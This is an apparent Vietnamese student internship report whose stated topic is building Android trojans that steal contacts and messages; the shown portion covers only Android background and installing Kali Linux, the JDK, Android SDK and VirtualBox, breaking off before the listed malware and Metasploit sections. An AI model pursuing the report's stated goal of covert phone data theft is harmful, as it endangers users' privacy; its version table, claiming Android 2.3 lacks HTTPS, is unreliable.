Upload
thanhthong1210
View
262
Download
10
Embed Size (px)
Citation preview
BÁO CÁO ĐỀ TÀI THỰC TẬP
ATHENA - TRUNG TÂM ĐÀO TẠO
QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ
BÁO CÁO Đ TÀI TH C T PỀ Ự Ậ
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
GIÁO VIÊN HƯỚNG DẪN: THẦY VÕ ĐỖ THẮNG
SINH VIÊN THỰC HIỆN: TRẦN THANH THÔNG
THÁNG 11/2014
SVTT : TRẦN THANH THÔNGMSSV : 1120168 1
BÁO CÁO ĐỀ TÀI THỰC TẬP
Ảnh chụp với Giáo viên hướng dẫn – Thầy Võ Đỗ Thắng
SVTT : TRẦN THANH THÔNGMSSV : 1120168 2
BÁO CÁO ĐỀ TÀI THỰC TẬP
NHẬN XÉT
(Của giáo viên hướng dẫn)
.............................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
……………….,ngày ……tháng ….. năm …..
Giáo viên hướng dẫn
SVTT : TRẦN THANH THÔNGMSSV : 1120168 3
BÁO CÁO ĐỀ TÀI THỰC TẬP
MỤC LỤC
LỜI CẢM ƠN....................................................................................................... 6
LỜI CAM KẾT..................................................................................................... 7
MỞ ĐẦU.............................................................................................................. 8
A - GIỚI THIỆU VỀ TRUNG TÂM ATHENA....................................................9
1.Lĩnh vực hoạt động chính ...................................................................................9
2. Đội ngũ giảng viên...........................................................................................10
3. Cơ sở vật chất ..................................................................................................10
4. Dịch vụ hổ trợ...................................................................................................10
B – NỘI DUNG THỰC TẬP...............................................................................11
1. TỔNG QUAN VỀ ANDROID........................................................................11
1.1 Giới thiệu .......................................................................................................11
1.2 Đặc điểm .......................................................................................................13
1.3 Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2x và 4.x......14
2. THỰC HIỆN TRÊN MẠNG LAN..................................................................17
2.1 NGHIÊN CỨU VÀ CÀI ĐẶT KALI LINUX TRÊN WWWARE...............17
2.2.1 Tìm hiểu Kli linux.......................................................................................17
2.1.2 Cài đặt Kali Linux trên VMware.................................................................19
2.2 MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX..............................................................................................................31
2.2.1 Tải và cài đặt JDK - Java SE Development ...............................................31
2.2.2 Tải về cài đặt Android SDK Manager.........................................................34
2.2.3 Tải về cài đặt phầm mềm tạo máy ảo VirtualBox.......................................36
2.2.4 Tải về cài đặt ứng dụng Genymotion .........................................................38
2.2.5 Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox...............41
2.3 TẠO MÃ ĐỘC TRÊN KALI LINUX NHẬP ANDROID............................44
2.3.1 Tạo mã độc trên Kali Linux xâm nhập Android ........................................44
2.3.2 Thực hiện khai thác dữ liệu trong SDcard .................................................52
SVTT : TRẦN THANH THÔNGMSSV : 1120168 4
BÁO CÁO ĐỀ TÀI THỰC TẬP
3. THỰC HIỆN TRÊN MÔI TRƯỜNG VPS .....................................................57
1.GIỚI THIỆU VỀ VPS.......................................................................................57
1.1 Định nghĩa .....................................................................................................57
1.2 Đặc điểm về thông số VPS.............................................................................57
1.3 Giá trị khi sử dụng VPS.................................................................................58
2. CÀI ĐẶT METASPLOIT ...............................................................................58
2.1 Giới thiệu Metasploit .....................................................................................58
2.2 Cài đặt ..........................................................................................................59
3.TẤN CÔNG MÁY ANDRIOD TỪ MÁY VPS...............................................65
3.1 Tạo ứng dụng chứa mã độc trên Kali Linux..................................................65
3.2 Tấn công điện thoại Android ........................................................................65
3.3 Các phương thức tấn công được sử dụng.......................................................66
KẾT LUẬN .........................................................................................................73
VIDEO QÚA TRÌNH THỰC HIỆN VÀ LINK FILE.........................................74
TRÍCH DẪN NGUỒN THAM KHẢO ..............................................................75
SVTT : TRẦN THANH THÔNGMSSV : 1120168 5
BÁO CÁO ĐỀ TÀI THỰC TẬP
lỜI CẢM ƠN
Trước tiên , em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự
Nhiên – TP Hồ Chí Minh nói chung và các thầy cô trong khoa Điện Tử Viễn Thông, bộ
môn Máy tính – Hệ thống nhúng nói riêng đã tận tình giảng dạy, truyền đạt cho em
những kiến thức, kinh nghiệm quý báu trong suốt bốn năm qua để em vững bước trên con
đường học tập và công việc của mình sau này.
Đặc biệt em xin gửi lời cảm ơn và lòng biết ơn sâu sắc đến thầy Võ Đỗ Thắng, các
thầy và anh chị trong Trung tâm ATHENA đã tận tình giúp đỡ, chỉ bảo và hướng dẫn em
trong suốt thời gian thực tập. Trong suốt thời gian làm việc với thầy và trung tâm em
không ngừng tiếp thu thêm nhiều kiến thức bổ ích mà còn học tập được tinh thần làm
việc, thái độ nghiên cứu nghiêm túc, hiệu quả, chi tiết, và làm quan được với môi trường
làm việc công nghiệp. Đây là những điều rất cần thiết cho em trong quá trình học tập và
làm việc sau này.
Sau cùng em xin gửi lời cảm ơn tới gia đình, các anh chị công tác trong khoa, bạn
bè đã động viên, đóng góp ý kiến và giúp đỡ trong quá trình học tập, nghiên cứu và hoàn
thành thực tập tốt nghiệp.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 6
BÁO CÁO ĐỀ TÀI THỰC TẬP
LỜI CAM KẾT
Em xin cam kết:
Những nội dung trong báo cáo này là do em tự thực hiện với sự hướng dẫn của
Thầy và anh chị tại Trung Tâm ATHENA.
Mọi tham khảo trong quá trình thực hiện báo cáo đều được trích dẫn rõ ràng về
nội dung, tác giả, địa chỉ tham khảo.
Nếu sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu
hoàn toàn trách nhiệm.
TP. Hồ Chí Minh, ngày 11 tháng 11 năm 2014
Sinh viên thực hiện
Trần Thanh Thông
SVTT : TRẦN THANH THÔNGMSSV : 1120168 7
BÁO CÁO ĐỀ TÀI THỰC TẬP
MỞ ĐẦU
Khi bắt đầu tìm kiếm môi trường phù hợp cho việc thực tập, em đã đặt cho mình
các mục tiêu sau:
- Tiếp cận với môi trường doanh nghiệp để học cách làm việc của họ.
- Nắm được quy trình phát triển phần mềm đang được áp dụng đồng thời tiếp cận được
công nghệ mới.
- Sử dụng được những kiến thức đã học trong 3 năm đầu.
- Nhận được những kiến thức cần thiết cho công việc mà không được đề cập trên giảng
đường.
- Trau dồi các kỹ năng bản thân, nhất là kỹ năng làm việc nhóm và khả năng sử dụng
tiếng Anh chuyên ngành.
Xét thấy 5 mục tiêu trên là cần thiết với một sinh viên sắp rời khỏi ghế nhà trường,
em cố gắng tìm kiêm một công ty, doanh nghiệp hay trung tâm có thể đáp ứng được
mong muốn của mình. Sau một thời gian dài tìm hiểu và thăm dò qua bạn bè và người
thân thấy “Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA”
nhận sinh viên thực tập về các đề tài công nghệ di động, hệ điều hành di động Android
mà em đang muốn tìm hiểu. Em quyết định nộp hồ sơ ứng tuyển vị trí thực tập sinh 2
SVTT : TRẦN THANH THÔNGMSSV : 1120168 8
BÁO CÁO ĐỀ TÀI THỰC TẬP
tháng tại Trung tâm ATHENA, và đã được trung tâm nhận vào vị trí thực tập viên 2
tháng.
Ngày 23/7/2014 em bắt đầu quá trình thực tập của mình ở trung tâm ATHENA.
A. GIỚI THIỆU VỀ TRUNG TÂM ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được
thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động,
nhiệt huyết và kinh nghiệm trong lãnh vực Công nghệ thông tin, với tâm huyết góp phần
vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp
phần phát triển nước nhà.
1. Lĩnh vực hoạt động chính:
- Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các
hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung
tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng
của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan
chính phủ, tổ chức tài chính..
SVTT : TRẦN THANH THÔNGMSSV : 1120168 9
BÁO CÁO ĐỀ TÀI THỰC TẬP
- Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA
đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ
ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin
Truyền Thông các tỉnh, bưu điện các tỉnh,.....
- Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương
trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành
Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự, ...
2. Đội ngũ giảng viên:
- Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường
đại học hàng đầu trong nước,... Tất cả giảng viên ATHENA đều phải có các chứng chỉ
quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư phạm Quốc tế
(Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện
tham gia giảng dạy tại trung tâm ATHENA.
- Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật
kiến thức công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore,... và
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm
ATHENA.
3. Cơ sở vật chất:
- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 10
BÁO CÁO ĐỀ TÀI THỰC TẬP
4. Dịch vụ hỗ trợ:
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,
mạng máy tính, bảo mật mạng.
- Hỗ trợ thi Chứng chỉ Quốc tế...
B. NỘI DUNG THỰC TẬP
1. TỔNG QUAN VỀ ANDROID
1.1 Giới thiệu:
- Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào
tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng
sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-
Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời
của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của
người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm,
Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần
mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một
SVTT : TRẦN THANH THÔNGMSSV : 1120168 11
BÁO CÁO ĐỀ TÀI THỰC TẬP
người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia
vào công ty.
- Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó
thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty
Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ
này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn
đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại
Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển
trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và
các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng
cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin
cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.
- Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động
xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích
rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di
động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông
truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm
tay mang thương hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang
thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà
sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải
một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng
chế trong lĩnh vực điện thoại di động.
- Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một
hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn Broadcom,
Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm,
Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển
các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt với vai trò
SVTT : TRẦN THANH THÔNGMSSV : 1120168 12
BÁO CÁO ĐỀ TÀI THỰC TẬP
là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên
nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC
Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android
mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
- Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều
hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản
nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng
miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên
bản 1.6 Donut (bánh vòng). Phiên bản mới nhất là 4.2 Jelly Bean (kẹo dẻo). Vào năm
2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông
minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất.
HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus
One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại
Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem
điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với
những tính năng phần cứng và phần mềm mới nhất của Android.
1.2 Đặc điểm:
- Tính mở: Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các
ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có.
Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện
thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo
phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên
nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và
phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở
rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi
cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo.
- Tính ngang bằng của các ứng dụng:
SVTT : TRẦN THANH THÔNGMSSV : 1120168 13
BÁO CÁO ĐỀ TÀI THỰC TẬP
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng
dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng
dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android,
người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn
hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng
dẫn điện thoại chỉ xem những ảnh mình thích.
- Phá vỡ rào cản phát triển ứng dụng:
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có
thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như
danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với
Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị
trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình
dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.
- Xây dựng ứng dụng dễ dàng và nhanh chóng:
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ
để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được
vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã
hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy
đủ giúp cho việc phát triển trở nên dễ dàng.
1.3 Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2.x và 4.x:
Theo thống kê tình hình những phiên bản hệ điều hành Android công bố đầu tháng
9 này đã cho thấy có nhiều sự thay đổi lớn. Phiên bản Gingerbread (2.3.x) dù đã ra mắt
rất lâu rồi nhưng vẫn về vị trí thứ 2 với 30,7% thị phần, đứng sau phiên bản Jelly Bean
(4.1.x và 4.2.x) với 45,1% thị phần và về vị trí thứ 3 là phiên bản Ice Cream Sandwich
(4.0.x) với 21,7% thị phần.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 14
BÁO CÁO ĐỀ TÀI THỰC TẬP
Ta có thể tải các tài liêu về các phiên bản Android do Google công bố ở link sau
để nghiên cứu và tìm hiểu: http://source.android.com/compatibility/downloads.html
Ở đây ta sẽ thấy được 4 điểm khác nhau rõ nét nhất của 2 phiên bản này:
- Giao diện (Graphical User Interface)
- Tính năng (Functionality)
- Giao thức mạng (Network Protocol)
- Yêu cầu phần cứng (Hardware)
1.4 Giao diện người dùng:
Android 2.3 Android 4.0
Giao diện đơn giản Giao diện trong suốt, tinh tế và
phong cách hơn
Không hỗ trợ phím ảo Hỗ trợ phím ảo
Không có widgets menu Có widgets menu
3.2. Tính năng:
Android 2.3 Android 4.0
Tối ưu hóa cho smart phone Tối ưu hóa cho cả tablets và smart
phone
Xóa tất cả thông báo Xóa được từng thông báo
SVTT : TRẦN THANH THÔNGMSSV : 1120168 15
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chỉ có thể trả lời cuộc gọi khi màn
hình bị khóa
Có thể thực hiện nhiều tính năng
khi màn hình bị khóa
Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn
mặt (face unclock)
Không có quản lý mức độ sử dụng
dữ liệu
Có quản lý mức độ xử dụng dữ
liệu
Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p
3.3. Giao thức mạng:
Android 2.3 Android 4.0
Không hỗ trợ giao thức https Hỗ trợ giao thức https
3.4. Yêu cầu phần cứng:
Android 2.3 Android 4.0
Cung cấp ít nhất 128MB cho
kernel
Cung cấp ít nhất 340MB cho
kernel
Dung lượng RAM ít nhất là
150MB
Dung lượng RAM ít nhất là
350MB
Thiết bị phải có khả năng tải về
một file 55MB hoặc hớn
hơn
Thiết bị phải có khả năng tải về
một file 100MB hoặc lớn
hơn
SVTT : TRẦN THANH THÔNGMSSV : 1120168 16
BÁO CÁO ĐỀ TÀI THỰC TẬP
Độ phân giải màn hình ít nhất
100dpi
Độ phân giải màn hình ít nhất
120dpi
Yêu cầu phải có các phím vật lý Không yêu cầu phải có các phím
vật lý
Kiểm tra hiệu suất dựa trên thời
gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Báo thức: ít hơn 650ms
Kiểm ra hiệu suất dựa trên thời
gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Cài đặt: ít hơn 700ms
2. THỰC HIỆN TRÊN MẠNG LAN
2.1 NGHIÊN CỨU VÀ CÀI ĐẶT KALI LINUX TRÊN VMWARE 2.1.1 Tìm hiểu Kali Linux
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để
kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux
là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng
sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã
công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản
SVTT : TRẦN THANH THÔNGMSSV : 1120168 17
BÁO CÁO ĐỀ TÀI THỰC TẬP
BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà
bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với
BackTrack, Kali có rất nhiều cải tiến:
Kali phát triển trên nền tảng hệ điều hành Debian.
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu
trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có
được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập
nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói
của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc
hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc
thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có
thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn.
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính
là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá
mạng không dây.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 18
BÁO CÁO ĐỀ TÀI THỰC TẬP
Khả năng tùy biến cao.
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối
với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như
GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai.
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali
đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng
không phải cài lại mới hoàn toàn nữa.
2.1.2 Cài đặt Kali Linux trên VMware
Trước khi cài đặt Kali Linux ta cần cài đặt máy ảo VMware (link download tại
đây).Sau đó tải về file ISO bản mới nhất của Kali Linux (link dưới), ở đề tài này chúng ta
sử dụng phiên bản Kali Linux 64 bit ISO 1.0.8 http://www.kali.org/downloads/
SVTT : TRẦN THANH THÔNGMSSV : 1120168 19
BÁO CÁO ĐỀ TÀI THỰC TẬP
Khởi động VMware, chọn Edit => Virtual Network Editor.
Trong phần Bridged (connect VMs directly to the external network) chọn card mạng
LAN của máy thật (như hình dưới) OK.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 20
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau đó,chọn File => New Virtual Machine Wizard => chọn Custom => Next
Chọn Installer Disc image file , và chọn đến file ISO cần cài đặt :
SVTT : TRẦN THANH THÔNGMSSV : 1120168 21
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn tên máy ảo và nơi lưu trữ :
SVTT : TRẦN THANH THÔNGMSSV : 1120168 22
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn RAM khoảng 1 GB => Next
SVTT : TRẦN THANH THÔNGMSSV : 1120168 23
BÁO CÁO ĐỀ TÀI THỰC TẬP
SVTT : TRẦN THANH THÔNGMSSV : 1120168 24
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn Use bridged networking => Next
Chọn LSI logic => Next => SCSI => Next => Create a new virtual disk => Next =>
Next => Next => Finish.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 25
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau đó khởi động máy ảo, tiến hành cài đặt :
Lựa chọn ngôn ngữ cài đặt, vị trí địa lí và cấu hình bàn phím
SVTT : TRẦN THANH THÔNGMSSV : 1120168 26
BÁO CÁO ĐỀ TÀI THỰC TẬP
Cấu hình Network và Password cho tài khoản Root
SVTT : TRẦN THANH THÔNGMSSV : 1120168 27
BÁO CÁO ĐỀ TÀI THỰC TẬP
Ở phần Write the changes to disks chọn Yes
SVTT : TRẦN THANH THÔNGMSSV : 1120168 28
BÁO CÁO ĐỀ TÀI THỰC TẬP
Sau khi cài đặt xong, chọn No ở phần Use a network mirror và Yes ở phần GURE
SVTT : TRẦN THANH THÔNGMSSV : 1120168 29
BÁO CÁO ĐỀ TÀI THỰC TẬP
Hoàn tất việc cài đặt, nhập user name là root và password đã đặt ở trước để đăng
nhập
Giao diện máy ảo sau khi hoàn thành :
SVTT : TRẦN THANH THÔNGMSSV : 1120168 30
BÁO CÁO ĐỀ TÀI THỰC TẬP
2.2 MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX
Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…).
Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android.
Các tools cần thiết để cài đặt :
- Phần mềm Virtual Box.- Phần mềm Genymotion.- Bộ công cụ phát triển Java SE Development Kit.- Bộ công cụ Android SDK Manager.
2.2.1 Tải và cài đặt JDK – Java SE Development Kit:
Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
Click chọn “Accept License Agreement”
SVTT : TRẦN THANH THÔNGMSSV : 1120168 31
BÁO CÁO ĐỀ TÀI THỰC TẬP
Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next. Cuối cùng click Close
SVTT : TRẦN THANH THÔNGMSSV : 1120168 32
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe
Gõ lệnh “java <Enter>”.
SVTT : TRẦN THANH THÔNGMSSV : 1120168 33
BÁO CÁO ĐỀ TÀI THỰC TẬP
2.2.2 Tải về và cài đặt Android SDK Manager:
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html
Click vào I have read and agree… và chọn phiên bản 64-bitClick Download
Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe
Lưu ý là có thể gặp lỗi Fetching https://dl-sll... Failed to fetch… Close thông báo này lại.
Xuất hiển cửa sổ Choose Packages to Install. Nếu cửa sổ này rỗng > CancelQuay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force
https://...Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK ManagerTa chọn các Packages muốn cài. Và Install
SVTT : TRẦN THANH THÔNGMSSV : 1120168 34
BÁO CÁO ĐỀ TÀI THỰC TẬP
SVTT : TRẦN THANH THÔNGMSSV : 1120168 35
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > Install > Chờ hoàn tất.
2.2.3 Tải về và cài đặt phần mềm tạo máy ảo VirtualBox:
Ta có thể bản VirtualBox phù hợp với máy của bạn.
Bước 1: Ta tải về file cài đặt VirtualBox tại trang:
http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html
SVTT : TRẦN THANH THÔNGMSSV : 1120168 36
BÁO CÁO ĐỀ TÀI THỰC TẬP
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
Bước 3: Next > Next > Next > Install > Finish
